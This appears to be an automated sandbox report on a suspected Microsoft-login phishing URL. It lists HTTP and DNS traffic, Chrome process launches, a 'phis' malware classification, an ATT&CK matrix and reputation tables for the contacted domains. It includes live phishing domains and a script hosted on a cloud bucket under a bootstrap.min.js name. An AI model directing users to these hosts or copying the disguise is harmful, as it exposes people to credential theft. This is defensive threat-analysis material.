Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://remotex.scienceexperimentlab.desec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://remotex.scienceexperimentlab.de/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: waub.scienceexperimentlab.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: waub.scienceexperimentlab.deConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CLbgygE=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: remotex.scienceexperimentlab.de
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: mailmeteor.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
Source: global trafficDNS traffic detected: DNS query: 6733994123-1317754460.cos.ap-bangkok.myqcloud.com
Source: global trafficDNS traffic detected: DNS query: waub.scienceexperimentlab.de
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1992192414:1742294144:lBKl-GQ87cx6YdPw8ANGt4nMRGVnHP2LBHmIvaQS3Vo/92247042bc5f72a7/.KZnVzwhwazmF3tFIkTicSNqBhEGbA8ENZ35afrR3lI-1742297851-1.1.1.1-QVqVfU3PcUbuxSRwC3ltnkt_OZK2e5jKlzcDFhf0iAztog_0If3XuxHsHFzKbXs8 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3768sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: .KZnVzwhwazmF3tFIkTicSNqBhEGbA8ENZ35afrR3lI-1742297851-1.1.1.1-QVqVfU3PcUbuxSRwC3ltnkt_OZK2e5jKlzcDFhf0iAztog_0If3XuxHsHFzKbXs8cf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rt1pg/0x4AAAAAABA4JrY35lEgjaNZ/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 11:37:33 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gjiWxxY3IOXaioB1i6XjXwStHLMyX%2BJJ2f%2BEVhJ%2Bt8CnnovAcABRnIhyT727ixQW4lxKVjQmHc%2FJ6Sx95uvUABBDQR5DGzJSYOgd2NtRLvEbk5lE1pV5oy5XvYQ8xVsh3DexI51vMSlF3V9I7WkldsCC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 9224704cc8b51a48-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1958&min_rtt=1952&rtt_var=745&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2864&recv_bytes=1249&delivery_rate=1454907&cwnd=174&unsent_bytes=0&cid=a76a1e9a6f694814&ts=338&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 18 Mar 2025 11:37:54 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400cf-cache-status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0u3UQmsK1dmv%2F09YudPd3sBUGCkJwgBL6H3CNaIJX0azdWWMXX%2FqZkwaB6ov1y%2FMP5s0%2FIts1nqWef9dbHzPdnzbhwZpiJRHskYFds7fj6G%2FBIV4L6pVB9r7LbUPUSbxtngnbNO%2BSOY%2BjiKtGolpEol%2F"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 922470d1196e4316-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1749&min_rtt=1744&rtt_var=665&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2863&recv_bytes=1249&delivery_rate=1630374&cwnd=196&unsent_bytes=0&cid=83981347ca0baf6d&ts=11290&x=0"
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 172.67.182.204:443 -> 192.168.2.16:49703 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.182.204:443 -> 192.168.2.16:49702 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49704 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49706 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.187.19:443 -> 192.168.2.16:49714 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49715 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.94.41:443 -> 192.168.2.16:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 142.250.181.228:443 -> 192.168.2.16:49720 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.16:49722 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.10.207:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.17.24.14:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.18.11.207:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 151.101.66.137:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 43.128.193.190:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.32.43:443 -> 192.168.2.16:49748 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.67.182.204:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7000_2113614120
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile deleted: C:\Windows\SystemTemp\scoped_dir7000_2113614120
Source: classification engineClassification label: mal52.phis.win@23/15@30/169
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\Google\Chrome\Application\Dictionaries
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2000,i,9432825401249524070,8579183881901806277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://remotex.scienceexperimentlab.de/3yAKy"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2000,i,9432825401249524070,8579183881901806277,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2196 /prefetch:3
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
12
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
Extra Window Memory Injection
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
File Deletion
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Extra Window Memory Injection
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://remotex.scienceexperimentlab.de/3yAKy0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=92247042bc5f72a7&lang=auto0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rt1pg/0x4AAAAAABA4JrY35lEgjaNZ/auto/fbE/new/normal/auto/0%Avira URL Cloudsafe
https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.png0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1992192414:1742294144:lBKl-GQ87cx6YdPw8ANGt4nMRGVnHP2LBHmIvaQS3Vo/92247042bc5f72a7/.KZnVzwhwazmF3tFIkTicSNqBhEGbA8ENZ35afrR3lI-1742297851-1.1.1.1-QVqVfU3PcUbuxSRwC3ltnkt_OZK2e5jKlzcDFhf0iAztog_0If3XuxHsHFzKbXs80%Avira URL Cloudsafe
https://6733994123-1317754460.cos.ap-bangkok.myqcloud.com/bootstrap.min.js0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/92247042bc5f72a7/1742297853202/qRvSdCt_a7T5ram0%Avira URL Cloudsafe
https://a.nel.cloudflare.com/report/v4?s=gjiWxxY3IOXaioB1i6XjXwStHLMyX%2BJJ2f%2BEVhJ%2Bt8CnnovAcABRnIhyT727ixQW4lxKVjQmHc%2FJ6Sx95uvUABBDQR5DGzJSYOgd2NtRLvEbk5lE1pV5oy5XvYQ8xVsh3DexI51vMSlF3V9I7WkldsCC0%Avira URL Cloudsafe
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/92247042bc5f72a7/1742297853200/e2714cc8792d701b2bbfcba2b5b219c48ad5a1f9df6267faca1c1ae07df6f785/-1qnsaGXyUNm7de0%Avira URL Cloudsafe
https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css0%Avira URL Cloudsafe
https://a.nel.cloudflare.com/report/v4?s=0u3UQmsK1dmv%2F09YudPd3sBUGCkJwgBL6H3CNaIJX0azdWWMXX%2FqZkwaB6ov1y%2FMP5s0%2FIts1nqWef9dbHzPdnzbhwZpiJRHskYFds7fj6G%2FBIV4L6pVB9r7LbUPUSbxtngnbNO%2BSOY%2BjiKtGolpEol%2F0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
mailmeteor.com
172.67.187.19
truefalse
    high
    stackpath.bootstrapcdn.com
    104.18.11.207
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        code.jquery.com
        151.101.66.137
        truefalse
          high
          cdnjs.cloudflare.com
          104.17.24.14
          truefalse
            high
            remotex.scienceexperimentlab.de
            172.67.182.204
            truetrue
              unknown
              challenges.cloudflare.com
              104.18.94.41
              truefalse
                high
                maxcdn.bootstrapcdn.com
                104.18.10.207
                truefalse
                  high
                  cos.ap-bangkok.myqcloud.com
                  43.128.193.190
                  truefalse
                    high
                    www.google.com
                    142.250.181.228
                    truefalse
                      high
                      waub.scienceexperimentlab.de
                      104.21.32.43
                      truefalse
                        unknown
                        6733994123-1317754460.cos.ap-bangkok.myqcloud.com
                        unknown
                        unknownfalse
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://6733994123-1317754460.cos.ap-bangkok.myqcloud.com/bootstrap.min.jsfalse
                          • Avira URL Cloud: safe
                          unknown
                          https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.jsfalse
                            high
                            https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                              high
                              https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=92247042bc5f72a7&lang=autofalse
                              • Avira URL Cloud: safe
                              unknown
                              https://a.nel.cloudflare.com/report/v4?s=0u3UQmsK1dmv%2F09YudPd3sBUGCkJwgBL6H3CNaIJX0azdWWMXX%2FqZkwaB6ov1y%2FMP5s0%2FIts1nqWef9dbHzPdnzbhwZpiJRHskYFds7fj6G%2FBIV4L6pVB9r7LbUPUSbxtngnbNO%2BSOY%2BjiKtGolpEol%2Ffalse
                              • Avira URL Cloud: safe
                              unknown
                              https://challenges.cloudflare.com/turnstile/v0/api.jsfalse
                                high
                                https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.jsfalse
                                  high
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/d/92247042bc5f72a7/1742297853202/qRvSdCt_a7T5ramfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/flow/ov1/1992192414:1742294144:lBKl-GQ87cx6YdPw8ANGt4nMRGVnHP2LBHmIvaQS3Vo/92247042bc5f72a7/.KZnVzwhwazmF3tFIkTicSNqBhEGbA8ENZ35afrR3lI-1742297851-1.1.1.1-QVqVfU3PcUbuxSRwC3ltnkt_OZK2e5jKlzcDFhf0iAztog_0If3XuxHsHFzKbXs8false
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1false
                                    high
                                    https://a.nel.cloudflare.com/report/v4?s=gjiWxxY3IOXaioB1i6XjXwStHLMyX%2BJJ2f%2BEVhJ%2Bt8CnnovAcABRnIhyT727ixQW4lxKVjQmHc%2FJ6Sx95uvUABBDQR5DGzJSYOgd2NtRLvEbk5lE1pV5oy5XvYQ8xVsh3DexI51vMSlF3V9I7WkldsCCfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.jsfalse
                                      high
                                      https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/rt1pg/0x4AAAAAABA4JrY35lEgjaNZ/auto/fbE/new/normal/auto/false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                        high
                                        https://mailmeteor.com/logos/assets/PNG/Microsoft_Logo_512px.pngfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.cssfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhEfalse
                                          high
                                          https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/pat/92247042bc5f72a7/1742297853200/e2714cc8792d701b2bbfcba2b5b219c48ad5a1f9df6267faca1c1ae07df6f785/-1qnsaGXyUNm7defalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          142.250.185.206
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.18.10.207
                                          maxcdn.bootstrapcdn.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          172.67.187.19
                                          mailmeteor.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          104.18.94.41
                                          challenges.cloudflare.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          216.58.206.78
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.21.32.43
                                          waub.scienceexperimentlab.deUnited States
                                          13335CLOUDFLARENETUSfalse
                                          151.101.66.137
                                          code.jquery.comUnited States
                                          54113FASTLYUSfalse
                                          35.190.80.1
                                          a.nel.cloudflare.comUnited States
                                          15169GOOGLEUSfalse
                                          142.250.184.195
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.17.24.14
                                          cdnjs.cloudflare.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          1.1.1.1
                                          unknownAustralia
                                          13335CLOUDFLARENETUSfalse
                                          43.128.193.190
                                          cos.ap-bangkok.myqcloud.comJapan4249LILLY-ASUSfalse
                                          142.250.186.163
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          216.58.206.67
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.185.234
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.217.18.3
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          172.67.182.204
                                          remotex.scienceexperimentlab.deUnited States
                                          13335CLOUDFLARENETUStrue
                                          216.58.206.42
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          104.18.11.207
                                          stackpath.bootstrapcdn.comUnited States
                                          13335CLOUDFLARENETUSfalse
                                          64.233.167.84
                                          unknownUnited States
                                          15169GOOGLEUSfalse
                                          142.250.181.228
                                          www.google.comUnited States
                                          15169GOOGLEUSfalse
                                          64.233.184.84
                                          unknownUnited States
